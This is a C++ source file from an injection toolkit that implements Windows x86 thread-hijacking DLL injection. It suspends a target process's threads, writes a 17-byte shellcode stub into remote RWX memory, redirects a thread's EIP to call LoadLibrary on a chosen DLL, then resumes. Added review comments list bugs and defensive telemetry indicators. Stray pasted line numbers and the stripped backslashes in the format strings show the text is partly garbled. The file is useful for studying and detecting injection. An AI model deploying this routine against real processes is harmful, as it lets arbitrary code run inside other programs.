/*
CreateMethods.cpp
brad.antoniewicz@foundstone.com

Contains the thread creation functions.

Currently implements:

1. Suspend/Inject/Resume Method
2. NtCreateThreadEx()
3. RtlCreateUserThread()
*/
  13.  
  14.  
  15.  
  16. #include <windows.h>
  17. #include <stdio.h>
  18. #include <tlhelp32.h>
  19. #include "ExecThread.h"
  20. #include "AllocWriteDLL.h"
  21.  
#ifndef _WIN64
VOID suspendInjectResume(HANDLE hHandle, LPVOID loadLibAddr, LPVOID dllPathAddr) {
/*
 * Thread-hijacking loader, x86 only: it edits CONTEXT.Eip/Esp and truncates
 * pointers to unsigned int, hence the surrounding #ifndef _WIN64.
 *
 * Flow: snapshot the threads of the process behind hHandle and suspend every
 * one of them; take the first thread enumerated for that process, push its
 * current EIP onto its own stack, write a 17-byte stub into an RWX allocation
 * in the target, point EIP at the stub with SetThreadContext, then resume all
 * threads. The stub saves flags/registers, calls loadLibAddr(dllPathAddr)
 * (one pushed argument), restores state and `ret`s to the saved EIP, so the
 * hijacked thread continues where it was interrupted.
 *
 * Parameters:
 *   hHandle     - process handle; used with GetProcessId, VirtualAllocEx and
 *                 WriteProcessMemory, so it needs the matching access rights.
 *   loadLibAddr - routine the stub calls via `mov eax, imm32; call eax`
 *                 (presumably LoadLibrary in the target - confirm with caller).
 *   dllPathAddr - the single argument pushed before the call (presumably the
 *                 path written by AllocWriteDLL.h - confirm with caller).
 * Returns nothing. Failures are printed and execution continues, except the
 * two Thread32First failures, which exit() the whole injector process.
 *
 * Defensive view: this is the classic SuspendThread / GetThreadContext /
 * VirtualAllocEx(PAGE_EXECUTE_READWRITE) / WriteProcessMemory /
 * SetThreadContext sequence against a remote process. Each of those
 * cross-process calls is a telemetry point, and the RWX remote allocation
 * plus a context change on another process's thread is the usual indicator.
 *
 * NOTE(review): the `t...n` at the ends of the format strings look like
 * `\t`/`\n` with the backslashes lost in the paste - confirm against the
 * original source before building.
 *
 * Author's note: this is a mixture from the following sites:
 *
 * http://syprog.blogspot.com/2012/05/createremotethread-bypass-windows.html
 * http://www.kdsbest.com/?p=159
 */

    /* Two snapshots taken up front: hSnapshot drives the suspend pass,
     * hSnapshot2 the resume pass, so both passes walk the same thread list.
     * NOTE(review): neither result is checked against INVALID_HANDLE_VALUE;
     * a failure only surfaces later when Thread32First fails. */
    HANDLE hSnapshot = CreateToolhelp32Snapshot( TH32CS_SNAPTHREAD, 0 );
    HANDLE hSnapshot2 = CreateToolhelp32Snapshot( TH32CS_SNAPTHREAD, 0 );
    HANDLE thread = NULL;
    THREADENTRY32 te;
    THREADENTRY32 te2;

    CONTEXT ctx;
    DWORD firstThread = 0;          /* ID of the first target thread found; the one hijacked */
    HANDLE targetThread = NULL;     /* handle to firstThread, opened below */

    LPVOID scAddr;                  /* remote address of the stub */

    int i;

    /* 17-byte x86 stub. Bytes 3-6 and 8-11 are placeholders (0xAA / 0xBB)
     * that are patched with the two addresses right after this table. */
    unsigned char sc[] = {
        // Push all flags
        0x9C,
        // Push all register
        0x60,
        // Push 3,4,5,6 (dllPathAddr)
        0x68, 0xAA, 0xAA, 0xAA, 0xAA,
        // Mov eax, 8,9,10, 11 (loadLibAddr)
        0xB8, 0xBB, 0xBB, 0xBB, 0xBB,
        // Call eax
        0xFF, 0xD0,
        // Pop all register
        0x61,
        // Pop all flags
        0x9D,
        // Ret
        0xC3
    };

    te.dwSize = sizeof(THREADENTRY32);      /* Thread32First requires dwSize to be set */
    te2.dwSize = sizeof(THREADENTRY32);
    ctx.ContextFlags = CONTEXT_FULL;        /* selects which registers GetThreadContext fills */

    /* Patch both imm32 placeholders little-endian. Truncating LPVOID to
     * unsigned int is only correct on 32-bit builds (see the _WIN64 guard). */
    sc[3] = ((unsigned int) dllPathAddr & 0xFF);
    sc[4] = (((unsigned int) dllPathAddr >> 8 )& 0xFF);
    sc[5] = (((unsigned int) dllPathAddr >> 16 )& 0xFF);
    sc[6] = (((unsigned int) dllPathAddr >> 24 )& 0xFF);

    sc[8] = ((unsigned int) loadLibAddr & 0xFF);
    sc[9] = (((unsigned int) loadLibAddr >> 8 )& 0xFF);
    sc[10] = (((unsigned int) loadLibAddr >> 16 )& 0xFF);
    sc[11] = (((unsigned int) loadLibAddr >> 24 )& 0xFF);



    // Suspend Threads
    // Every thread owned by the target process is suspended so nothing runs
    // while the hijacked thread's context is edited. The first match is
    // remembered in firstThread.
    // NOTE(review): if no thread matches, firstThread stays 0 and the
    // OpenThread/GetThreadContext/SetThreadContext calls below run against a
    // NULL handle; only messages are printed, nothing aborts.
    if(Thread32First(hSnapshot, &te)) {
        do {
            if(te.th32OwnerProcessID == GetProcessId(hHandle)) {
                if ( firstThread == 0 )
                    firstThread = te.th32ThreadID;
                thread = OpenThread(THREAD_ALL_ACCESS | THREAD_GET_CONTEXT, FALSE, te.th32ThreadID);
                if(thread != NULL) {
                    printf("t[+] Suspending Thread 0x%08xn", te.th32ThreadID);
                    /* NOTE(review): return value ((DWORD)-1 on failure) is not checked */
                    SuspendThread(thread);
                    CloseHandle(thread);
                } else {
                    printf("t[+] Could not open thread!n");
                }
            }
        } while(Thread32Next(hSnapshot, &te));
    } else {
        printf("t[+] Could not Thread32First! [%d]n", GetLastError());
        CloseHandle(hSnapshot);
        /* Terminates the injector process itself; nothing has been suspended yet. */
        exit(-1);
    }
    CloseHandle(hSnapshot);

    /* Hex dump of the patched stub.
     * NOTE(review): the literal 17 here, in VirtualAllocEx and in the
     * WriteProcessMemory below duplicates sizeof(sc). */
    printf("t[+] Our Launcher Code:nt");
    for (i=0; i<17; i++)
        printf("%02x ",sc[i]);
    printf("n");
    // Get/Save EIP, Inject
    printf("t[+] Targeting Thread 0x%08xn",firstThread);
    /* NOTE(review): targetThread is never NULL-checked and never closed (handle leak). */
    targetThread = OpenThread(THREAD_ALL_ACCESS, FALSE, firstThread);
    if (GetThreadContext(targetThread, &ctx) == 0)
        /* NOTE(review): execution continues with an unfilled ctx after this message */
        printf("[!] GetThreadContext Failed!n");
    printf("t[+] Current Registers: nttEIP[0x%08x] ESP[0x%08x]n", ctx.Eip, ctx.Esp);

    printf("t[+] Saving EIP for our returnn");
    /* Push the interrupted EIP onto the target thread's own stack so the
     * stub's final `ret` lands back there. */
    ctx.Esp -= sizeof(unsigned int);
    /* NOTE(review): return value ignored; a failed write leaves a bogus return address. */
    WriteProcessMemory(hHandle, (LPVOID)ctx.Esp, (LPCVOID)&ctx.Eip, sizeof(unsigned int), NULL);
    printf("ttEIP[0x%08x] ESP[0x%08x] EBP[0x%08x]n", ctx.Eip, ctx.Esp, ctx.Ebp);

    /* RWX allocation in the target for the stub.
     * NOTE(review): scAddr is not checked for NULL before it is written to and
     * loaded into EIP. The format string pairs %08x with a pointer and %d with
     * a DWORD (GetLastError); %p / %lu would match. */
    scAddr = VirtualAllocEx(hHandle, NULL, 17, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    printf("t[+] Allocating 17 bytes for our Launcher Code [0x%08x][%d]n", scAddr, GetLastError());

    /* The write's BOOL result is only printed, never acted on. */
    printf ("t[+] Writing Launcher Code into targetThread [%d]n", WriteProcessMemory(hHandle, scAddr, (LPCVOID)sc, 17, NULL));

    printf("t[+] Setting EIP to LauncherCoden");
    ctx.Eip = (DWORD)scAddr;        /* redirect the thread to the stub */
    printf("ttEIP[0x%08x] ESP[0x%08x]n", ctx.Eip, ctx.Esp);

    if (SetThreadContext(targetThread, &ctx) == 0)
        /* NOTE(review): threads are still resumed below even when this failed */
        printf("[!] SetThreadContext Failed!n");

    // Resume Threads
    /* NOTE(review): this third snapshot and the te.dwSize reset are dead code -
     * the loop below walks hSnapshot2/te2 - and the new hSnapshot handle is
     * never closed. */
    hSnapshot = CreateToolhelp32Snapshot( TH32CS_SNAPTHREAD, 0 );
    te.dwSize = sizeof(THREADENTRY32);

    if(Thread32First(hSnapshot2, &te2)) {
        do {
            if(te2.th32OwnerProcessID == GetProcessId(hHandle)) {
                thread = OpenThread(THREAD_ALL_ACCESS | THREAD_GET_CONTEXT, FALSE, te2.th32ThreadID);
                if(thread != NULL) {
                    printf("t[+] Resuming Thread 0x%08xn", te2.th32ThreadID);
                    ResumeThread(thread);
                    /* Waits up to 5 s for the hijacked thread to terminate. Since the
                     * stub `ret`s to the saved EIP, that thread normally keeps running,
                     * so this most likely just consumes the timeout - confirm intent. */
                    if (te2.th32ThreadID == firstThread)
                        WaitForSingleObject(thread, 5000);
                    CloseHandle(thread);
                } else {
                    printf("t[+] Could not open thread!n");
                }
            }
        } while(Thread32Next(hSnapshot2, &te2));
    } else {
        printf("t[+] Could not Thread32First! [%d]n", GetLastError());
        CloseHandle(hSnapshot2);
        /* NOTE(review): exiting here leaves every target thread suspended, i.e.
         * the target process is left hung. */
        exit(-1);
    }
    CloseHandle(hSnapshot2);
}
#endif